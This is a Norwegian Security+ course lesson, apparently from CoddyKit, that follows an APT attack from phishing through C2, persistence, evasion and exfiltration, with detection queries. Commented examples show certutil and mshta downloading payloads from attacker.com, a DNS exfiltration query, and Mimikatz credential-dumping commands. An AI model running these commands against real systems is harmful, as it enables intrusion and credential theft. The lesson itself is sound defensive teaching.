APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse
Følg en APT fra første tilgang gjennom målrettet phishing, etablering av C2, rettighetseskalering og mekanismer for vedvarende tilstedeværelse som overlever omstarter og ny avbildning.
APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse er en gratis leksjon i Security+ Academy på CoddyKit. Dette er leksjon 1 av 4. Du kan lese valgfritt 3 leksjoner fra denne læringsstien gratis i sin helhet – deretter låser CoddyKit PRO opp alle leksjoner, samt praktisk øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Den er en del av læringsløpet i Security+ Academy, og fremdriften din synkroniseres mellom nettet og CoddyKit-appen. Kurset i Security+ Academy inneholder totalt 4 leksjoner.
Hva er en avansert vedvarende trussel?
En Advanced Persistent Threat (APT) er en sofistikert, langsiktig cyberangrepskampanje som vanligvis gjennomføres av statlige aktører eller velfinansierte kriminelle grupper med bestemte strategiske mål. De tre kjennetegnene er: Advanced – bruker spesialtilpasset skadevare, zero-day-sårbarheter og nye teknikker; Persistent – opprettholder en skjult tilstedeværelse i måneder eller år, og er ikke et kortvarig angrep; Threat – et koordinert, målrettet angrep mot en bestemt organisasjon. Kjente APT-grupper omfatter APT28 (Fancy Bear), som knyttes til Russlands GRU, APT41, som knyttes til Kina, og Lazarus Group, som knyttes til Nord-Korea.
Første tilgang: Slik kommer APT-er inn
APT-kampanjer begynner vanligvis med én av et lite antall velprøvde teknikker for første tilgang. Målrettet phishing med våpengjorte vedlegg eller lenker som stjeler påloggingsinformasjon, er den vanligste metoden – e-posten ser ut til å komme fra en betrodd kollega eller partner. Kompromittering av leverandørkjeden (som i SolarWinds/SUNBURST) legger inn skadelig kode i pålitelige programvareoppdateringer. Utnyttelse av internetteksponerte tjenester (VPN-enheter, Exchange-servere, webapplikasjoner) ved hjelp av CVE-er som ikke er rettet. Vannhullsangrep kompromitterer nettsteder som ansatte i målorganisasjonen ofte besøker, og leverer drive-by-utnyttelser til besøkende.
Kjøring: Den første payloaden kjøres
Etter å ha oppnådd første tilgang må angriperen kjøre den første payloaden på målsystemet. APT-er foretrekker teknikker som glir inn i normal systemaktivitet: skadelige makroer i Office-dokumenter som kjøres når offeret aktiverer innhold; HTML Application-filer (HTA-filer) som kjører skript når de åpnes; Living-off-the-Land Binaries (LOLBins) – bruk av legitime Windows-verktøy som mshta.exe, certutil.exe, regsvr32.exe eller wscript.exe til å kjøre angriperkode og omgå tillatelseslister for applikasjoner. Disse teknikkene gjør det vanskelig å skille de første payloadene fra legitim systemaktivitet.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsEtablering av C2: Ringer hjem
Når den første payloaden er kjørt, oppretter den en Command and Control (C2)-kanal tilbake til angriperens infrastruktur. Moderne APT-C2 bruker teknikker som er utviklet for å unngå oppdagelse: HTTPS til etterligningsdomener som ligner på legitime nettskytjenester (Teams, OneDrive, GitHub); DNS-tunnellering – kommandoer kodes i forespørsler etter DNS TXT-poster som ser ut som vanlig DNS-trafikk; Domain Generation Algorithms (DGA-er) som hver dag genererer et nytt C2-domene fra et utgangspunkt, slik at blokkering av domener blir ineffektiv; og C2 basert på living-off-the-land, der legitime nettskyplattformer (Slack API, Google Sheets, Twitter) brukes som kommunikasjonskanal.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)Kartlegging: Kartlegging av miljøet
Etter at C2 er etablert, gjennomfører APT-aktører intern rekognosering for å forstå miljøet før de går videre. Dette omfatter: opptelling av Active Directory ved hjelp av verktøy som BloodHound for å kartlegge tillitsforhold og identifisere verdifulle mål; nettverksskanning for å identifisere aktive verter, tjenester og åpne porter; oppdagelse av påloggingsinformasjon ved å søke i filsystemer etter konfigurasjonsfiler, passorddatabaser eller påloggingsinformasjon som er lagret i nettlesere; og identitetskartlegging for å identifisere privilegerte kontoer, tjenestekontoer og arbeidsstasjoner for administratorer. Mesteparten av kartleggingsaktiviteten bruker innebygde Windows-verktøy (net user /domain, ipconfig, nltest) for å unngå oppdagelse.
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesRettighetseskalering: Skaffe administratortilgang
APT-er oppnår vanligvis første tilgang med begrensede brukerlegitimasjoner og må eskalere rettigheter for å nå målene sine. Vanlige veier til eskalering omfatter: tyveri av påloggingsinformasjon fra minnet ved hjelp av Mimikatz (uthenting av NTLM-hashverdier fra minnet til LSASS-prosessen); Kerberoasting (forespørsel om tjenestebilletter for tjenestekontoer og cracking av dem utenfor nettet); utnyttelse av feilkonfigurerte tjenester med svake tillatelser (usikre stier til tjenestebinærfiler, DLL-kapring); og personifisering av token for å stjele autentiseringstokenet til en privilegert prosess. Teknikker for å omgå User Account Control (UAC) gjør det mulig å gå fra standard administratortilgang til SYSTEM uten å utløse en UAC-forespørsel.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processMekanismer for vedvarende tilgang: Overleve omstarter
APT-er investerer betydelig i mekanismer for vedvarende tilgang som overlever omstarter og reinstalleringer, fordi det kan ha vært vanskelig og kostbart å oppnå den første tilgangen. Vanlige teknikker for vedvarende tilgang i Windows er: Registry Run Keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); Scheduled Tasks som kjører skadevare etter en fast tidsplan; Windows Services som starter automatisk; WMI Event Subscriptions (vanskelige å oppdage og overlever de fleste oppryddingsforsøk); DLL Search Order Hijacking; og Boot/Pre-OS-implantater (UEFI-fastvareimplantater som overlever reinstallering av operativsystemet, brukt av Equation Group og aktører med tilknytning til NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'Omgåelse av forsvar: Å skjule seg i det åpne
APT-er benytter omfattende omgåelse av forsvar for å unngå å bli oppdaget av sikkerhetsverktøy for endepunkter og analytikere. Teknikker omfatter: prosessinjeksjon — å injisere skadelig kode i legitime prosesser som explorer.exe eller svchost.exe, slik at skadevaren kjører under et prosessnavn som anses som pålitelig; timestomping — å endre filers tidsstempler slik at skadelige filer ser ut til å ha eksistert i årevis; sletting og manipulering av logger — å tømme Windows-hendelseslogger for å fjerne spor; misbruk av kodesigneringssertifikater — å signere skadevare med stjålne, legitime sertifikater; og kjøring i minnet (filløs skadevare), som aldri skrives til disken, der filbasert antivirus ville ha oppdaget den.
Eksfiltrering: Å stjele data i det skjulte
APT-er håndterer dataeksfiltrering nøye for å unngå å utløse DLP-kontroller og deteksjon av avvikende båndbreddebruk. Teknikker omfatter: klargjøring av data — å samle målrettede data i et kryptert arkiv før de eksfiltreres i små deler over flere dager; HTTPS-eksfiltrering til skylagringstjenester (OneDrive, Dropbox) som er tillatt av virksomhetens brannmurregler; steganografi — å skjule data i bildefiler; og tidsbasert eksfiltrering i arbeidstiden for å gli inn i legitim trafikk. APT-er eksfiltrerer bare det de trenger (verdifull immateriell eiendom, legitimasjon og strategiske planer) i stedet for å kopiere alt i store mengder — noe som minimerer fotavtrykket og sannsynligheten for å bli oppdaget.
Oppdage APT-aktivitet: Viktige indikatorer
Deteksjon av APT-er krever at man ser utover individuelle varsler for å identifisere mønstre av relaterte aktiviteter på tvers av hele angrepskjeden. Viktige indikatorer omfatter: uvanlige foreldre- og underordnede prosessforhold (for eksempel at Word starter PowerShell); PowerShell-kommandoer med koding eller nedlastinger fra Internett; planlagte oppgaver eller tjenester som opprettes på uvanlige tidspunkter; tilgang til LSASS-minnet fra prosesser som ikke er systemprosesser; sideveis forflytning via SMB eller WMI fra arbeidsstasjoner; og uvanlige utgående DNS-spørringer med lange underdomenenavn. MITRE ATT&CK Navigator gjør det mulig for forsvarere å koble oppdagede teknikker til ATT&CK-matrisen og identifisere hull i deteksjonsdekningen.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineAPT-respons: Begrensning uten å varsle angriperen
Håndtering av en aktiv APT krever en nøye balansegang: Begrens trusselen uten å varsle angriperen. For tidlig begrensning (blokkering av C2-trafikk eller deaktivering av kontoer) kan føre til at APT-en aktiverer destruktive nyttelaster eller fremskynder eksfiltreringen. Anbefalte fremgangsmåter omfatter: skjult overvåking mens man innhenter etterretning; gradvis segmentering av infiserte verter ved hjelp av brannmurregler uten å blokkere C2; implementering av villedende teknologier (honningtokens og kanarikontoer) for å overvåke angriperens aktivitet; og koordinering med politiet før større begrensningstiltak. Full utbedring krever at alle mekanismer for vedvarende tilgang og kompromitterte kontoer identifiseres — ett eneste oversett implantat betyr at angriperen kommer tilbake.
Hurtigsjekk
Test forståelsen Deres av konseptene i CompTIA Security+ (SY0-701) fra denne leksjonen.
Oppsummering av leksjonen
I denne leksjonen har De lært at: APT-er er avanserte, vedvarende og målrettede kampanjer som vanligvis pågår i flere måneder og bruker målrettet phishing, forsyningskjedeangrep eller utnyttelse av sårbarheter for å oppnå innledende tilgang; APT-er bruker LOLBins og legitime skytjenester til C2 for å gli inn i normal trafikk og unngå deteksjon; og mekanismer for vedvarende tilgang varierer fra Registry Run Keys til UEFI-fastvareimplantater — der WMI-abonnementer er spesielt vanskelige å oppdage og utbedre. Deretter skal vi se nærmere på teknikker for sideveis forflytning, blant annet Pass-the-Hash og Pass-the-Ticket.
Lær deg Security+ Academy med en AI-veileder – gratis
Skriv og kjør ekte kode i nettleseren, få umiddelbar hjelp fra en AI-veileder som er tilgjengelig døgnet rundt, og fortsett der du slapp – på nettet eller i appen.
- Kurs
- 30
- Leksjoner
- 120
Ofte stilte spørsmål
Er leksjonen «APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse» gratis?
Ja – du kan lese valgfritt 3 av leksjonene i læringsstien Security+ Academy, inkludert «APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse», gratis i sin helhet her på nettet. Deretter låser CoddyKit PRO opp alle leksjoner, samt interaktiv øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Kurset i Security+ Academy inneholder totalt 4 leksjoner.
Hva lærer jeg i «APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse»?
Følg en APT fra første tilgang gjennom målrettet phishing, etablering av C2, rettighetseskalering og mekanismer for vedvarende tilstedeværelse som overlever omstarter og ny avbildning. Du øver på Security+ Academy med praktisk kode som du kjører direkte i nettleseren, mens en AI-veileder som er tilgjengelig døgnet rundt, svarer på spørsmålene dine mens du jobber deg gjennom leksjonen.
Trenger jeg erfaring for å begynne med Security+ Academy?
Ingen tidligere erfaring er nødvendig. Security+ Academy på CoddyKit er lagt opp for både nybegynnere og viderekomne, så De kan begynne her eller helt fra start og lære i Deres eget tempo. Dette er leksjon 1 av 4.
Hvor lang tid tar leksjonen «APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse»?
De fleste CoddyKit-leksjoner tar omtrent 5–10 minutter. Hver leksjon er kort og interaktiv, slik at De gjør jevne fremskritt og kan fortsette akkurat der De slapp – både på nettet og i appen.
Kan jeg skrive og kjøre kode i denne Security+ Academy-leksjonen?
Ja. Alle Security+ Academy-leksjoner har en innebygd kodeeditor, slik at De kan skrive og kjøre ekte kode direkte i nettleseren og få umiddelbar tilbakemelding fra AI – uten lokal konfigurering.
Alle leksjonene i dette kurset
- APT-livssyklus: fra første tilgang til vedvarende tilstedeværelse
- Lateral bevegelse: Pass-the-Hash og Pass-the-Ticket
- Kerberoasting- og Golden Ticket-angrep
- MITRE ATT&CK-rammeverket for deteksjon og respons